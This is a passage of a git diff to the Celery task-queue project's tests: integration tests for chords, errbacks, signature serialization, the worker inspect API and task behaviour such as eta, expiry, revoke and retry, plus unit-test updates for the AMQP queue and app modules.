+ with subtests.test(msg="Error propagates from header group"):
+ redis_connection.delete(redis_key)
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after header group fails"):
+ # NOTE: Here we only expect the errback to be called once since it
+ # is attached to the chord body which is a single task!
+ await_redis_count(1, redis_key=redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from body group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after body group fails"):
+ # NOTE: Here we expect the errback to be called once per failing
+ # task in the chord body since it is a group
+ await_redis_count(fail_task_count, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ @pytest.mark.parametrize(
+ "errback_task", [errback_old_style, errback_new_style, ],
+ )
+ def test_mutable_errback_called_by_chord_from_group_fail_multiple(
+ self, errback_task, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ fail_task_count = 42
+ # We have to use failing task signatures with unique task IDs to ensure
+ # the chord can complete when they are used as part of its header!
+ fail_sigs = tuple(
+ fail.s() for _ in range(fail_task_count)
+ )
+ fail_sig_ids = tuple(s.freeze().id for s in fail_sigs)
+ errback = errback_task.s()
+ # Include a mix of passing and failing tasks
+ child_sig = group(
+ *(identity.si(42) for _ in range(24)), # arbitrary task count
+ *fail_sigs,
+ )
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ expected_redis_key = chord_sig.body.freeze().id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(msg="Error propagates from header group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after header group fails"):
+ # NOTE: Here we only expect the errback to be called once since it
+ # is attached to the chord body which is a single task!
+ await_redis_count(1, redis_key=expected_redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ for fail_sig_id in fail_sig_ids:
+ redis_connection.delete(fail_sig_id)
+ with subtests.test(msg="Error propagates from body group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after body group fails"):
+ # NOTE: Here we expect the errback to be called once per failing
+ # task in the chord body since it is a group, and each task has a
+ # unique task ID
+ for i, fail_sig_id in enumerate(fail_sig_ids):
+ await_redis_count(
+ 1, redis_key=fail_sig_id,
+ # After the first one is seen, check the rest with no
+ # timeout since waiting to confirm that each one doesn't
+ # get over-incremented will take a long time
+ timeout=TIMEOUT if i == 0 else 0,
+ )
+ for fail_sig_id in fail_sig_ids:
+ redis_connection.delete(fail_sig_id)
+
+ def test_chord_header_task_replaced_with_chain(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ replace_with_chain.si(42),
+ identity.s(),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42]
+
+ def test_chord_header_child_replaced_with_chain_first(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ (replace_with_chain.si(42), identity.s(1337), ),
+ identity.s(),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42, 1337]
+
+ def test_chord_header_child_replaced_with_chain_middle(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ (identity.s(42), replace_with_chain.s(1337), identity.s(31337), ),
+ identity.s(),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42, 1337, 31337]
+
+ def test_chord_header_child_replaced_with_chain_last(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ (identity.s(42), replace_with_chain.s(1337), ),
+ identity.s(),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42, 1337]
+
+ def test_chord_body_task_replaced_with_chain(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ identity.s(42),
+ replace_with_chain.s(),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42]
+
+ def test_chord_body_chain_child_replaced_with_chain_first(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ identity.s(42),
+ chain(replace_with_chain.s(), identity.s(), ),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42]
+
+ def test_chord_body_chain_child_replaced_with_chain_middle(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ identity.s(42),
+ chain(identity.s(), replace_with_chain.s(), identity.s(), ),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42]
+
+ def test_chord_body_chain_child_replaced_with_chain_last(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ identity.s(42),
+ chain(identity.s(), replace_with_chain.s(), ),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42]
+
+
+class test_signature_serialization:
+ """
+ Confirm nested signatures can be rebuilt after passing through a backend.
+
+ These tests are expected to finish and return `None` or raise an exception
+ in the error case. The exception indicates that some element of a nested
+ signature object was not properly deserialized from its dictionary
+ representation, and would explode later on if it were used as a signature.
+ """
+
+ def test_rebuild_nested_chain_chain(self, manager):
+ sig = chain(
+ tasks.return_nested_signature_chain_chain.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_chain_group(self, manager):
+ sig = chain(
+ tasks.return_nested_signature_chain_group.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_chain_chord(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chain(
+ tasks.return_nested_signature_chain_chord.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_group_chain(self, manager):
+ sig = chain(
+ tasks.return_nested_signature_group_chain.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_group_group(self, manager):
+ sig = chain(
+ tasks.return_nested_signature_group_group.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_group_chord(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chain(
+ tasks.return_nested_signature_group_chord.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_chord_chain(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chain(
+ tasks.return_nested_signature_chord_chain.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_chord_group(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chain(
+ tasks.return_nested_signature_chord_group.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_chord_chord(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chain(
+ tasks.return_nested_signature_chord_chord.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
diff --git a/t/integration/test_inspect.py b/t/integration/test_inspect.py
new file mode 100644
index 00000000000..60332f0071d
--- /dev/null
+++ b/t/integration/test_inspect.py
@@ -0,0 +1,237 @@
+import os
+import re
+from datetime import datetime, timedelta
+from time import sleep
+from unittest.mock import ANY
+
+import pytest
+
+from celery.utils.nodenames import anon_nodename
+
+from .tasks import add, sleeping
+
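+# Nodename of the single worker this integration suite talks to.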
+NODENAME = anon_nodename()
+
+_flaky = pytest.mark.flaky(reruns=5, reruns_delay=2)
+_timeout = pytest.mark.timeout(timeout=300)
+
+
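+# Combine automatic reruns on failure with a hard per-test timeout.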
+def flaky(fn):
+ return _timeout(_flaky(fn))
+
+
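+# Inspect client bound to the managed test app, recreated for each test.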
+@pytest.fixture()
+def inspect(manager):
+ return manager.app.control.inspect()
+
+
+class test_Inspect:
+ """Integration tests fo app.control.inspect() API"""
+
+ @flaky
+ def test_ping(self, inspect):
+ """Tests pinging the worker"""
+ ret = inspect.ping()
+ assert len(ret) == 1
+ assert ret[NODENAME] == {'ok': 'pong'}
+        # TODO: Check that ping() returns None after the worker is stopped.
+        # This is tricky since the current test suite does not support
+        # stopping the worker.
+
+ @flaky
+ def test_clock(self, inspect):
+ """Tests getting clock information from worker"""
+ ret = inspect.clock()
+ assert len(ret) == 1
+ assert ret[NODENAME]['clock'] > 0
+
+ @flaky
+ def test_registered(self, inspect):
+ """Tests listing registered tasks"""
+        # TODO: We could also check the exact values of the registered tasks
+ ret = inspect.registered()
+ assert len(ret) == 1
+        assert len(ret[NODENAME]) > 0
+ for task_name in ret[NODENAME]:
+ assert isinstance(task_name, str)
+
+ ret = inspect.registered('name')
+ for task_info in ret[NODENAME]:
+ # task_info is in form 'TASK_NAME [name=TASK_NAME]'
+ assert re.fullmatch(r'\S+ \[name=\S+\]', task_info)
+
+ @flaky
+ def test_active_queues(self, inspect):
+ """Tests listing active queues"""
+ ret = inspect.active_queues()
+ assert len(ret) == 1
+ assert ret[NODENAME] == [
+ {
+ 'alias': None,
+ 'auto_delete': False,
+ 'binding_arguments': None,
+ 'bindings': [],
+ 'consumer_arguments': None,
+ 'durable': True,
+ 'exchange': {
+ 'arguments': None,
+ 'auto_delete': False,
+ 'delivery_mode': None,
+ 'durable': True,
+ 'name': 'celery',
+ 'no_declare': False,
+ 'passive': False,
+ 'type': 'direct'
+ },
+ 'exclusive': False,
+ 'expires': None,
+ 'max_length': None,
+ 'max_length_bytes': None,
+ 'max_priority': None,
+ 'message_ttl': None,
+ 'name': 'celery',
+ 'no_ack': False,
+ 'no_declare': None,
+ 'queue_arguments': None,
+ 'routing_key': 'celery'}
+ ]
+
+ @flaky
+ def test_active(self, inspect):
+ """Tests listing active tasks"""
+ res = sleeping.delay(5)
+ sleep(1)
+ ret = inspect.active()
+ assert len(ret) == 1
+ assert ret[NODENAME] == [
+ {
+ 'id': res.task_id,
+ 'name': 't.integration.tasks.sleeping',
+ 'args': [5],
+ 'kwargs': {},
+ 'type': 't.integration.tasks.sleeping',
+ 'hostname': ANY,
+ 'time_start': ANY,
+ 'acknowledged': True,
+ 'delivery_info': {
+ 'exchange': '',
+ 'routing_key': 'celery',
+ 'priority': 0,
+ 'redelivered': False
+ },
+ 'worker_pid': ANY
+ }
+ ]
+
+ @flaky
+ def test_scheduled(self, inspect):
+ """Tests listing scheduled tasks"""
+ exec_time = datetime.utcnow() + timedelta(seconds=5)
+ res = add.apply_async([1, 2], {'z': 3}, eta=exec_time)
+ ret = inspect.scheduled()
+ assert len(ret) == 1
+ assert ret[NODENAME] == [
+ {
+ 'eta': exec_time.strftime('%Y-%m-%dT%H:%M:%S.%f') + '+00:00',
+ 'priority': 6,
+ 'request': {
+ 'id': res.task_id,
+ 'name': 't.integration.tasks.add',
+ 'args': [1, 2],
+ 'kwargs': {'z': 3},
+ 'type': 't.integration.tasks.add',
+ 'hostname': ANY,
+ 'time_start': None,
+ 'acknowledged': False,
+ 'delivery_info': {
+ 'exchange': '',
+ 'routing_key': 'celery',
+ 'priority': 0,
+ 'redelivered': False
+ },
+ 'worker_pid': None
+ }
+ }
+ ]
+
+ @flaky
+ def test_query_task(self, inspect):
+ """Task that does not exist or is finished"""
+ ret = inspect.query_task('d08b257e-a7f1-4b92-9fea-be911441cb2a')
+ assert len(ret) == 1
+ assert ret[NODENAME] == {}
+
+ # Task in progress
+ res = sleeping.delay(5)
+ sleep(1)
+ ret = inspect.query_task(res.task_id)
+ assert len(ret) == 1
+ assert ret[NODENAME] == {
+ res.task_id: [
+ 'active', {
+ 'id': res.task_id,
+ 'name': 't.integration.tasks.sleeping',
+ 'args': [5],
+ 'kwargs': {},
+ 'type': 't.integration.tasks.sleeping',
+ 'hostname': NODENAME,
+ 'time_start': ANY,
+ 'acknowledged': True,
+ 'delivery_info': {
+ 'exchange': '',
+ 'routing_key': 'celery',
+ 'priority': 0,
+ 'redelivered': False
+ },
+                # worker is running in the same process as a separate thread
+ 'worker_pid': ANY
+ }
+ ]
+ }
+
+ @flaky
+ def test_stats(self, inspect):
+ """tests fetching statistics"""
+ ret = inspect.stats()
+ assert len(ret) == 1
+ assert ret[NODENAME]['pool']['max-concurrency'] == 1
+ assert len(ret[NODENAME]['pool']['processes']) == 1
+ assert ret[NODENAME]['uptime'] > 0
+        # worker is running in the same process as a separate thread
+ assert ret[NODENAME]['pid'] == os.getpid()
+
+ @flaky
+ def test_report(self, inspect):
+ """Tests fetching report"""
+ ret = inspect.report()
+ assert len(ret) == 1
+ assert ret[NODENAME] == {'ok': ANY}
+
+ @flaky
+ def test_revoked(self, inspect):
+ """Testing revoking of task"""
+ # Fill the queue with tasks to fill the queue
+ for _ in range(4):
+ sleeping.delay(2)
+ # Execute task and revoke it
+ result = add.apply_async((1, 1))
+ result.revoke()
+ ret = inspect.revoked()
+ assert len(ret) == 1
+ assert result.task_id in ret[NODENAME]
+
+ @flaky
+ def test_conf(self, inspect):
+ """Tests getting configuration"""
+ ret = inspect.conf()
+ assert len(ret) == 1
+ assert ret[NODENAME]['worker_hijack_root_logger'] == ANY
+ assert ret[NODENAME]['worker_log_color'] == ANY
+ assert ret[NODENAME]['accept_content'] == ANY
+ assert ret[NODENAME]['enable_utc'] == ANY
+ assert ret[NODENAME]['timezone'] == ANY
+ assert ret[NODENAME]['broker_url'] == ANY
+ assert ret[NODENAME]['result_backend'] == ANY
+ assert ret[NODENAME]['broker_heartbeat'] == ANY
+ assert ret[NODENAME]['deprecated_settings'] == ANY
+ assert ret[NODENAME]['include'] == ANY
diff --git a/t/integration/test_tasks.py b/t/integration/test_tasks.py
index edfda576f5b..5596e2986bf 100644
--- a/t/integration/test_tasks.py
+++ b/t/integration/test_tasks.py
@@ -1,10 +1,16 @@
+from datetime import datetime, timedelta
+from time import perf_counter, sleep
+
import pytest
+import celery
from celery import group
from .conftest import get_active_redis_channels
-from .tasks import (ClassBasedAutoRetryTask, add, add_ignore_result,
- print_unicode, retry_once, retry_once_priority, sleeping)
+from .tasks import (ClassBasedAutoRetryTask, ExpectedException, add,
+ add_ignore_result, add_not_typed, fail, print_unicode,
+ retry, retry_once, retry_once_priority, return_properties,
+ sleeping)
TIMEOUT = 10
@@ -28,8 +34,220 @@ def test_class_based_task_retried(self, celery_session_app,
assert res.get(timeout=TIMEOUT) == 1
+def _producer(j):
+ """Single producer helper function"""
+ results = []
+ for i in range(20):
+ results.append([i + j, add.delay(i, j)])
+ for expected, result in results:
+ value = result.get(timeout=10)
+ assert value == expected
+ assert result.status == 'SUCCESS'
+ assert result.ready() is True
+ assert result.successful() is True
+ return j
+
+
class test_tasks:
+ def test_simple_call(self):
+ """Tests direct simple call of task"""
+ assert add(1, 1) == 2
+ assert add(1, 1, z=1) == 3
+
+ @flaky
+ def test_basic_task(self, manager):
+ """Tests basic task call"""
+ results = []
+ # Tests calling task only with args
+ for i in range(10):
+ results.append([i + i, add.delay(i, i)])
+ for expected, result in results:
+ value = result.get(timeout=10)
+ assert value == expected
+ assert result.status == 'SUCCESS'
+ assert result.ready() is True
+ assert result.successful() is True
+
+ results = []
+ # Tests calling task with args and kwargs
+ for i in range(10):
+ results.append([3*i, add.delay(i, i, z=i)])
+ for expected, result in results:
+ value = result.get(timeout=10)
+ assert value == expected
+ assert result.status == 'SUCCESS'
+ assert result.ready() is True
+ assert result.successful() is True
+
+ @flaky
+ def test_multiprocess_producer(self, manager):
+ """Testing multiple processes calling tasks."""
+ from multiprocessing import Pool
+ pool = Pool(20)
+ ret = pool.map(_producer, range(120))
+ assert list(ret) == list(range(120))
+
+ @flaky
+ def test_multithread_producer(self, manager):
+ """Testing multiple threads calling tasks."""
+ from multiprocessing.pool import ThreadPool
+ pool = ThreadPool(20)
+ ret = pool.map(_producer, range(120))
+ assert list(ret) == list(range(120))
+
+ @flaky
+ def test_ignore_result(self, manager):
+ """Testing calling task with ignoring results."""
+ result = add.apply_async((1, 2), ignore_result=True)
+ assert result.get() is None
+ # We wait since it takes a bit of time for the result to be
+ # persisted in the result backend.
+ sleep(1)
+ assert result.result is None
+
+ @flaky
+ def test_timeout(self, manager):
+ """Testing timeout of getting results from tasks."""
+ result = sleeping.delay(10)
+ with pytest.raises(celery.exceptions.TimeoutError):
+ result.get(timeout=5)
+
+ @flaky
+ def test_expired(self, manager):
+ """Testing expiration of task."""
+        # Fill the queue with tasks which take > 1 sec to process
+ for _ in range(4):
+ sleeping.delay(2)
+ # Execute task with expiration = 1 sec
+ result = add.apply_async((1, 1), expires=1)
+ with pytest.raises(celery.exceptions.TaskRevokedError):
+ result.get()
+ assert result.status == 'REVOKED'
+ assert result.ready() is True
+ assert result.failed() is False
+ assert result.successful() is False
+
+        # Fill the queue with tasks which take > 1 sec to process
+ for _ in range(4):
+ sleeping.delay(2)
+ # Execute task with expiration at now + 1 sec
+ result = add.apply_async((1, 1), expires=datetime.utcnow() + timedelta(seconds=1))
+ with pytest.raises(celery.exceptions.TaskRevokedError):
+ result.get()
+ assert result.status == 'REVOKED'
+ assert result.ready() is True
+ assert result.failed() is False
+ assert result.successful() is False
+
+ @flaky
+ def test_eta(self, manager):
+ """Tests tasks scheduled at some point in future."""
+ start = perf_counter()
+ # Schedule task to be executed in 3 seconds
+ result = add.apply_async((1, 1), countdown=3)
+ sleep(1)
+ assert result.status == 'PENDING'
+ assert result.ready() is False
+ assert result.get() == 2
+ end = perf_counter()
+ assert result.status == 'SUCCESS'
+ assert result.ready() is True
+        # The delay between submitting the task and getting the result must exceed 3 secs
+ assert (end - start) > 3
+
+ start = perf_counter()
+ # Schedule task to be executed at time now + 3 seconds
+ result = add.apply_async((2, 2), eta=datetime.utcnow() + timedelta(seconds=3))
+ sleep(1)
+ assert result.status == 'PENDING'
+ assert result.ready() is False
+ assert result.get() == 4
+ end = perf_counter()
+ assert result.status == 'SUCCESS'
+ assert result.ready() is True
+        # The delay between submitting the task and getting the result must exceed 3 secs
+ assert (end - start) > 3
+
+ @flaky
+ def test_fail(self, manager):
+ """Tests that the failing task propagates back correct exception."""
+ result = fail.delay()
+ with pytest.raises(ExpectedException):
+ result.get(timeout=5)
+ assert result.status == 'FAILURE'
+ assert result.ready() is True
+ assert result.failed() is True
+ assert result.successful() is False
+
+ @flaky
+ def test_revoked(self, manager):
+ """Testing revoking of task"""
+ # Fill the queue with tasks to fill the queue
+ for _ in range(4):
+ sleeping.delay(2)
+ # Execute task and revoke it
+ result = add.apply_async((1, 1))
+ result.revoke()
+ with pytest.raises(celery.exceptions.TaskRevokedError):
+ result.get()
+ assert result.status == 'REVOKED'
+ assert result.ready() is True
+ assert result.failed() is False
+ assert result.successful() is False
+
+ @flaky
+ def test_wrong_arguments(self, manager):
+ """Tests that proper exceptions are raised when task is called with wrong arguments."""
+ with pytest.raises(TypeError):
+ add(5)
+
+ with pytest.raises(TypeError):
+ add(5, 5, wrong_arg=5)
+
+ with pytest.raises(TypeError):
+ add.delay(5)
+
+ with pytest.raises(TypeError):
+ add.delay(5, wrong_arg=5)
+
+ # Tasks with typing=False are not checked but execution should fail
+ result = add_not_typed.delay(5)
+ with pytest.raises(TypeError):
+ result.get(timeout=5)
+ assert result.status == 'FAILURE'
+
+ result = add_not_typed.delay(5, wrong_arg=5)
+ with pytest.raises(TypeError):
+ result.get(timeout=5)
+ assert result.status == 'FAILURE'
+
+ @flaky
+ def test_retry(self, manager):
+ """Tests retrying of task."""
+ # Tests when max. retries is reached
+ result = retry.delay()
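+        # Poll for up to five seconds for the task to leave the PENDING state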
+ for _ in range(5):
+ status = result.status
+ if status != 'PENDING':
+ break
+ sleep(1)
+ assert status == 'RETRY'
+ with pytest.raises(ExpectedException):
+ result.get()
+ assert result.status == 'FAILURE'
+
+        # Tests when the task is retried but eventually returns the correct result
+ result = retry.delay(return_value='bar')
+ for _ in range(5):
+ status = result.status
+ if status != 'PENDING':
+ break
+ sleep(1)
+ assert status == 'RETRY'
+ assert result.get() == 'bar'
+ assert result.status == 'SUCCESS'
+
@flaky
def test_task_accepted(self, manager, sleep=1):
r1 = sleeping.delay(sleep)
@@ -53,6 +271,11 @@ def test_unicode_task(self, manager):
timeout=TIMEOUT, propagate=True,
)
+ @flaky
+ def test_properties(self, celery_session_worker):
+ res = return_properties.apply_async(app_id="1234")
+ assert res.get(timeout=TIMEOUT)["app_id"] == "1234"
+
class tests_task_redis_result_backend:
def setup(self, manager):
diff --git a/t/unit/app/test_amqp.py b/t/unit/app/test_amqp.py
index ee36c08e235..bc2d26d3680 100644
--- a/t/unit/app/test_amqp.py
+++ b/t/unit/app/test_amqp.py
@@ -89,23 +89,6 @@ def test_setitem_adds_default_exchange(self):
q['foo'] = queue
assert q['foo'].exchange == q.default_exchange
- @pytest.mark.parametrize('ha_policy,qname,q,qargs,expected', [
- (None, 'xyz', 'xyz', None, None),
- (None, 'xyz', 'xyz', {'x-foo': 'bar'}, {'x-foo': 'bar'}),
- ('all', 'foo', Queue('foo'), None, {'ha-mode': 'all'}),
- ('all', 'xyx2',
- Queue('xyx2', queue_arguments={'x-foo': 'bar'}),
- None,
- {'ha-mode': 'all', 'x-foo': 'bar'}),
- (['A', 'B', 'C'], 'foo', Queue('foo'), None, {
- 'ha-mode': 'nodes',
- 'ha-params': ['A', 'B', 'C']}),
- ])
- def test_with_ha_policy(self, ha_policy, qname, q, qargs, expected):
- queues = Queues(ha_policy=ha_policy, create_missing=False)
- queues.add(q, queue_arguments=qargs)
- assert queues[qname].queue_arguments == expected
-
def test_select_add(self):
q = Queues()
q.select(['foo', 'bar'])
@@ -118,11 +101,6 @@ def test_deselect(self):
q.deselect('bar')
assert sorted(q._consume_from.keys()) == ['foo']
- def test_with_ha_policy_compat(self):
- q = Queues(ha_policy='all')
- q.add('bar')
- assert q['bar'].queue_arguments == {'ha-mode': 'all'}
-
def test_add_default_exchange(self):
ex = Exchange('fff', 'fanout')
q = Queues(default_exchange=ex)
@@ -143,12 +121,6 @@ def test_alias(self):
({'max_priority': 10},
'moo', Queue('moo', queue_arguments=None),
{'x-max-priority': 10}),
- ({'ha_policy': 'all', 'max_priority': 5},
- 'bar', 'bar',
- {'ha-mode': 'all', 'x-max-priority': 5}),
- ({'ha_policy': 'all', 'max_priority': 5},
- 'xyx2', Queue('xyx2', queue_arguments={'x-max-priority': 2}),
- {'ha-mode': 'all', 'x-max-priority': 2}),
({'max_priority': None},
'foo2', 'foo2',
None),
@@ -255,10 +227,6 @@ def test_countdown_negative(self):
with pytest.raises(ValueError):
self.app.amqp.as_task_v2(uuid(), 'foo', countdown=-1232132323123)
- def test_Queues__with_ha_policy(self):
- x = self.app.amqp.Queues({}, ha_policy='all')
- assert x.ha_policy == 'all'
-
def test_Queues__with_max_priority(self):
x = self.app.amqp.Queues({}, max_priority=23)
assert x.max_priority == 23
diff --git a/t/unit/app/test_app.py b/t/unit/app/test_app.py
index 9571b401254..ed61b0f8356 100644
--- a/t/unit/app/test_app.py
+++ b/t/unit/app/test_app.py
@@ -2,13 +2,13 @@
import itertools
import os
import ssl
+import uuid
from copy import deepcopy
from datetime import datetime, timedelta
from pickle import dumps, loads
from unittest.mock import Mock, patch
import pytest
-from case import ContextMock, mock
from vine import promise
from celery import Celery, _state
@@ -16,6 +16,8 @@
from celery import current_app, shared_task
from celery.app import base as _appbase
from celery.app import defaults
+from celery.backends.base import Backend
+from celery.contrib.testing.mocks import ContextMock
from celery.exceptions import ImproperlyConfigured
from celery.loaders.base import unconfigured
from celery.platforms import pyimplementation
@@ -23,6 +25,7 @@
from celery.utils.objects import Bunch
from celery.utils.serialization import pickle
from celery.utils.time import localize, timezone, to_utc
+from t.unit import conftest
THIS_IS_A_KEY = 'this is a value'
@@ -218,6 +221,13 @@ def test_using_v1_reduce(self):
self.app._using_v1_reduce = True
assert loads(dumps(self.app))
+ def test_autodiscover_tasks_force_fixup_fallback(self):
+ self.app.loader.autodiscover_tasks = Mock()
+ self.app.autodiscover_tasks([], force=True)
+ self.app.loader.autodiscover_tasks.assert_called_with(
+ [], 'tasks',
+ )
+
def test_autodiscover_tasks_force(self):
self.app.loader.autodiscover_tasks = Mock()
self.app.autodiscover_tasks(['proj.A', 'proj.B'], force=True)
@@ -265,6 +275,14 @@ def test_with_broker(self, patching):
with self.Celery(broker='foo://baribaz') as app:
assert app.conf.broker_url == 'foo://baribaz'
+ def test_pending_configuration_non_true__kwargs(self):
+ with self.Celery(task_create_missing_queues=False) as app:
+ assert app.conf.task_create_missing_queues is False
+
+ def test_pending_configuration__kwargs(self):
+ with self.Celery(foo='bar') as app:
+ assert app.conf.foo == 'bar'
+
def test_pending_configuration__setattr(self):
with self.Celery(broker='foo://bar') as app:
app.conf.task_default_delivery_mode = 44
@@ -494,6 +512,16 @@ def foo():
finally:
_imports.MP_MAIN_FILE = None
+ def test_can_get_type_hints_for_tasks(self):
+ import typing
+
+ with self.Celery() as app:
+ @app.task
+ def foo(parameter: int) -> None:
+ pass
+
+ assert typing.get_type_hints(foo) == {'parameter': int, 'return': type(None)}
+
def test_annotate_decorator(self):
from celery.app.task import Task
@@ -556,20 +584,12 @@ def test_pickle_app(self):
for key, value in changes.items():
assert restored.conf[key] == value
- # def test_worker_main(self):
- # from celery.bin import worker as worker_bin
- #
- # class worker(worker_bin.worker):
- #
- # def execute_from_commandline(self, argv):
- # return argv
- #
- # prev, worker_bin.worker = worker_bin.worker, worker
- # try:
- # ret = self.app.worker_main(argv=['--version'])
- # assert ret == ['--version']
- # finally:
- # worker_bin.worker = prev
+ @patch('celery.bin.celery.celery')
+ def test_worker_main(self, mocked_celery):
+ self.app.worker_main(argv=['worker', '--help'])
+
+ mocked_celery.main.assert_called_with(
+ args=['worker', '--help'], standalone_mode=False)
def test_config_from_envvar(self):
os.environ['CELERYTEST_CONFIG_OBJECT'] = 't.unit.app.test_app'
@@ -752,6 +772,11 @@ def test_config_from_envvar_more(self, key='CELERY_HARNESS_CFG1'):
assert self.app.conf['FOO'] == 10
assert self.app.conf['BAR'] == 20
+ @patch('celery.bin.celery.celery')
+ def test_start(self, mocked_celery):
+ self.app.start()
+ mocked_celery.main.assert_called()
+
@pytest.mark.parametrize('url,expected_fields', [
('pyamqp://', {
'hostname': 'localhost',
@@ -891,10 +916,10 @@ def add(x, y):
assert 'add1' in self.app.conf.beat_schedule
assert 'add2' in self.app.conf.beat_schedule
- def test_pool_no_multiprocessing(self):
- with mock.mask_modules('multiprocessing.util'):
- pool = self.app.pool
- assert pool is self.app._pool
+ @pytest.mark.masked_modules('multiprocessing.util')
+ def test_pool_no_multiprocessing(self, mask_modules):
+ pool = self.app.pool
+ assert pool is self.app._pool
def test_bugreport(self):
assert self.app.bugreport()
@@ -970,6 +995,63 @@ class CustomCelery(type(self.app)):
app = CustomCelery(set_as_current=False)
assert isinstance(app.tasks, TaskRegistry)
+ def test_oid(self):
+        # Test that oid is a global value.
+ oid1 = self.app.oid
+ oid2 = self.app.oid
+ uuid.UUID(oid1)
+ uuid.UUID(oid2)
+ assert oid1 == oid2
+
+ def test_global_oid(self):
+        # Test that oid is a global value shared across threads
+ main_oid = self.app.oid
+ uuid.UUID(main_oid)
+ from concurrent.futures import ThreadPoolExecutor
+ with ThreadPoolExecutor(max_workers=1) as executor:
+ future = executor.submit(lambda: self.app.oid)
+ thread_oid = future.result()
+ uuid.UUID(thread_oid)
+ assert main_oid == thread_oid
+
+ def test_thread_oid(self):
+        # Test that thread_oid is consistent within a single thread.
+ oid1 = self.app.thread_oid
+ oid2 = self.app.thread_oid
+ uuid.UUID(oid1)
+ uuid.UUID(oid2)
+ assert oid1 == oid2
+
+ def test_backend(self):
+        # Test that app.backend returns the same backend within a single thread
+ backend1 = self.app.backend
+ backend2 = self.app.backend
+ assert isinstance(backend1, Backend)
+ assert isinstance(backend2, Backend)
+ assert backend1 is backend2
+
+ def test_thread_backend(self):
+        # Test that app.backend returns a new backend for each thread
+ main_backend = self.app.backend
+ from concurrent.futures import ThreadPoolExecutor
+ with ThreadPoolExecutor(max_workers=1) as executor:
+ future = executor.submit(lambda: self.app.backend)
+ thread_backend = future.result()
+ assert isinstance(main_backend, Backend)
+ assert isinstance(thread_backend, Backend)
